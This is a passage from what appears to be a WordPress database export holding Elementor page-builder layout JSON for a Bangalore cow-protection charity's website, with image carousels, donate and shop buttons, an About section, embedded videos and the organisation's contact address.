pe\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#FFCC2A\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"gradient\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#FFCC2A\",\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"gradient\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11595,1925,'_elementor_page_assets','a:0:{}'),(11597,1926,'_elementor_edit_mode','builder'),(11598,1926,'_elementor_template_type','wp-page'),(11599,1926,'_elementor_version','3.7.8'),(11600,1926,'_wp_page_template','elementor_canvas'),(11601,1926,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About 